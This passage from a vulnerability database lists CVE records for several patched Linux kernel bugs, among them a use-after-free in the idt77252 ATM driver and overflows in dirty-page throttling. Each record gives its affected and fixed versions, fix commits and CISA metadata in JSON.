Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44998",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:19:05.283493Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:19:17.632Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:54.152Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/atm/idt77252.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "628ea82190a678a56d2ec38cda3addf3b3a6248d",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "09e086a5f72ea27c758b3f3b419a69000c32adc1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "1cece837e387c039225f19028df255df87a97c0d",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "24cf390a5426aac9255205e9533cdd7b4235d518",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "379a6a326514a3e2f71b674091dfb0e0e7522b55",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "ef23c18ab88e33ce000d06a5c6aad0620f219bfd",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "91b4850e7165a4b7180ef1e227733bcb41ccdf10",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "a9a18e8f770c9b0703dab93580d0b02e199a4c79",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/atm/idt77252.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.321",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.321",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\natm: idt77252: prevent use after free in dequeue_rx()\n\nWe can\u0027t dereference \"skb\" after calling vcc-\u003epush() because the skb\nis released."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:42.730Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/628ea82190a678a56d2ec38cda3addf3b3a6248d"
        },
        {
          "url": "https://git.kernel.org/stable/c/09e086a5f72ea27c758b3f3b419a69000c32adc1"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cece837e387c039225f19028df255df87a97c0d"
        },
        {
          "url": "https://git.kernel.org/stable/c/24cf390a5426aac9255205e9533cdd7b4235d518"
        },
        {
          "url": "https://git.kernel.org/stable/c/379a6a326514a3e2f71b674091dfb0e0e7522b55"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef23c18ab88e33ce000d06a5c6aad0620f219bfd"
        },
        {
          "url": "https://git.kernel.org/stable/c/91b4850e7165a4b7180ef1e227733bcb41ccdf10"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9a18e8f770c9b0703dab93580d0b02e199a4c79"
        }
      ],
      "title": "atm: idt77252: prevent use after free in dequeue_rx()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44998",
    "datePublished": "2024-09-04T19:54:42.826Z",
    "dateReserved": "2024-08-21T05:34:56.672Z",
    "dateUpdated": "2025-11-03T22:14:54.152Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46819 (GCVE-0-2024-46819)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:19

Title

drm/amdgpu: the warning dereferencing obj for nbio_v7_4

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: the warning dereferencing obj for nbio_v7_4 if ras_manager obj null, don't print NBIO err data

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/614564a5b28983de5…
	https://git.kernel.org/stable/c/d04ded1e73f1dcf19…
	https://git.kernel.org/stable/c/70e8ec21fcb8c5144…
	https://git.kernel.org/stable/c/7d265772e44d40307…
	https://git.kernel.org/stable/c/130c2dc75c8c40acc…
	https://git.kernel.org/stable/c/d190b459b2a430430…

Impacted products

Vendor

Product

Version

Linux

Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < 614564a5b28983de53b23a358ebe6c483a2aa21e (git)
Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < d04ded1e73f1dcf19a71ec8b9cda3faa7acd8828 (git)
Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < 70e8ec21fcb8c51446899d3bfe416b31adfa3661 (git)
Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < 7d265772e44d403071a2b573eac0db60250b1c21 (git)
Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < 130c2dc75c8c40acc3c96ededea6af80e03c14b8 (git)
Affected: fe3c948918e7e3d18eed85571d32a2f7c4b63a84 , < d190b459b2a4304307c3468ed97477b808381011 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46819",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:14:11.855110Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:14:21.338Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:19:08.048Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "614564a5b28983de53b23a358ebe6c483a2aa21e",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            },
            {
              "lessThan": "d04ded1e73f1dcf19a71ec8b9cda3faa7acd8828",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            },
            {
              "lessThan": "70e8ec21fcb8c51446899d3bfe416b31adfa3661",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            },
            {
              "lessThan": "7d265772e44d403071a2b573eac0db60250b1c21",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            },
            {
              "lessThan": "130c2dc75c8c40acc3c96ededea6af80e03c14b8",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            },
            {
              "lessThan": "d190b459b2a4304307c3468ed97477b808381011",
              "status": "affected",
              "version": "fe3c948918e7e3d18eed85571d32a2f7c4b63a84",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: the warning dereferencing obj for nbio_v7_4\n\nif ras_manager obj null, don\u0027t print NBIO err data"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-20T14:27:39.710Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/614564a5b28983de53b23a358ebe6c483a2aa21e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d04ded1e73f1dcf19a71ec8b9cda3faa7acd8828"
        },
        {
          "url": "https://git.kernel.org/stable/c/70e8ec21fcb8c51446899d3bfe416b31adfa3661"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d265772e44d403071a2b573eac0db60250b1c21"
        },
        {
          "url": "https://git.kernel.org/stable/c/130c2dc75c8c40acc3c96ededea6af80e03c14b8"
        },
        {
          "url": "https://git.kernel.org/stable/c/d190b459b2a4304307c3468ed97477b808381011"
        }
      ],
      "title": "drm/amdgpu: the warning dereferencing obj for nbio_v7_4",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46819",
    "datePublished": "2024-09-27T12:35:59.820Z",
    "dateReserved": "2024-09-11T15:12:18.284Z",
    "dateUpdated": "2025-11-03T22:19:08.048Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42131 (GCVE-0-2024-42131)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2026-01-05 10:51

Title

mm: avoid overflows in dirty throttling logic

Summary

In the Linux kernel, the following vulnerability has been resolved: mm: avoid overflows in dirty throttling logic The dirty throttling logic is interspersed with assumptions that dirty limits in PAGE_SIZE units fit into 32-bit (so that various multiplications fit into 64-bits). If limits end up being larger, we will hit overflows, possible divisions by 0 etc. Fix these problems by never allowing so large dirty limits as they have dubious practical value anyway. For dirty_bytes / dirty_background_bytes interfaces we can just refuse to set so large limits. For dirty_ratio / dirty_background_ratio it isn't so simple as the dirty limit is computed from the amount of available memory which can change due to memory hotplug etc. So when converting dirty limits from ratios to numbers of pages, we just don't allow the result to exceed UINT_MAX. This is root-only triggerable problem which occurs when the operator sets dirty limits to >16 TB.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2b2d2b8766db028bd…
	https://git.kernel.org/stable/c/4d3817b64eda07491…
	https://git.kernel.org/stable/c/7a49389771ae7666f…
	https://git.kernel.org/stable/c/a25e8536184516b55…
	https://git.kernel.org/stable/c/c83ed422c24f0d4b2…
	https://git.kernel.org/stable/c/bd16a7ee339aef3ee…
	https://git.kernel.org/stable/c/8e0b5e7f2895eccef…
	https://git.kernel.org/stable/c/385d838df280eba6c…

Impacted products

Vendor

Product

Version

Linux

Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < 2b2d2b8766db028bd827af34075f221ae9e9efff (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < 4d3817b64eda07491bdd86a234629fe0764fb42a (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < 7a49389771ae7666f4dc3426e2a4594bf23ae290 (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < a25e8536184516b55ef89ab91dd2eea429de28d2 (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < c83ed422c24f0d4b264f89291d4fabe285f80dbc (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < bd16a7ee339aef3ee4c90cb23902afb6af379ea0 (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < 8e0b5e7f2895eccef5c2a0018b589266f90c4805 (git)
Affected: 2da02997e08d3efe8174c7a47696e6f7cbe69ba9 , < 385d838df280eba6c8680f9777bfa0d0bfe7e8b2 (git)

Linux

Affected: 2.6.29
Unaffected: 0 , < 2.6.29 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:02.307Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a49389771ae7666f4dc3426e2a4594bf23ae290"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a25e8536184516b55ef89ab91dd2eea429de28d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c83ed422c24f0d4b264f89291d4fabe285f80dbc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bd16a7ee339aef3ee4c90cb23902afb6af379ea0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e0b5e7f2895eccef5c2a0018b589266f90c4805"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/385d838df280eba6c8680f9777bfa0d0bfe7e8b2"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42131",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:25.346003Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:36.512Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2b2d2b8766db028bd827af34075f221ae9e9efff",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "4d3817b64eda07491bdd86a234629fe0764fb42a",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "7a49389771ae7666f4dc3426e2a4594bf23ae290",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "a25e8536184516b55ef89ab91dd2eea429de28d2",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "c83ed422c24f0d4b264f89291d4fabe285f80dbc",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "bd16a7ee339aef3ee4c90cb23902afb6af379ea0",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "8e0b5e7f2895eccef5c2a0018b589266f90c4805",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            },
            {
              "lessThan": "385d838df280eba6c8680f9777bfa0d0bfe7e8b2",
              "status": "affected",
              "version": "2da02997e08d3efe8174c7a47696e6f7cbe69ba9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.29"
            },
            {
              "lessThan": "2.6.29",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: avoid overflows in dirty throttling logic\n\nThe dirty throttling logic is interspersed with assumptions that dirty\nlimits in PAGE_SIZE units fit into 32-bit (so that various multiplications\nfit into 64-bits).  If limits end up being larger, we will hit overflows,\npossible divisions by 0 etc.  Fix these problems by never allowing so\nlarge dirty limits as they have dubious practical value anyway.  For\ndirty_bytes / dirty_background_bytes interfaces we can just refuse to set\nso large limits.  For dirty_ratio / dirty_background_ratio it isn\u0027t so\nsimple as the dirty limit is computed from the amount of available memory\nwhich can change due to memory hotplug etc.  So when converting dirty\nlimits from ratios to numbers of pages, we just don\u0027t allow the result to\nexceed UINT_MAX.\n\nThis is root-only triggerable problem which occurs when the operator\nsets dirty limits to \u003e16 TB."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:57.843Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2b2d2b8766db028bd827af34075f221ae9e9efff"
        },
        {
          "url": "https://git.kernel.org/stable/c/4d3817b64eda07491bdd86a234629fe0764fb42a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a49389771ae7666f4dc3426e2a4594bf23ae290"
        },
        {
          "url": "https://git.kernel.org/stable/c/a25e8536184516b55ef89ab91dd2eea429de28d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/c83ed422c24f0d4b264f89291d4fabe285f80dbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/bd16a7ee339aef3ee4c90cb23902afb6af379ea0"
        },
        {
          "url": "https://git.kernel.org/stable/c/8e0b5e7f2895eccef5c2a0018b589266f90c4805"
        },
        {
          "url": "https://git.kernel.org/stable/c/385d838df280eba6c8680f9777bfa0d0bfe7e8b2"
        }
      ],
      "title": "mm: avoid overflows in dirty throttling logic",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42131",
    "datePublished": "2024-07-30T07:46:26.872Z",
    "dateReserved": "2024-07-29T15:50:41.186Z",
    "dateUpdated": "2026-01-05T10:51:57.843Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42284 (GCVE-0-2024-42284)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:08 – Updated: 2025-11-03 22:03

Title

tipc: Return non-zero value from tipc_udp_addr2str() on error

Summary

In the Linux kernel, the following vulnerability has been resolved: tipc: Return non-zero value from tipc_udp_addr2str() on error tipc_udp_addr2str() should return non-zero value if the UDP media address is invalid. Otherwise, a buffer overflow access can occur in tipc_media_addr_printf(). Fix this by returning 1 on an invalid UDP media address.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7ec3335dd89c8d169…
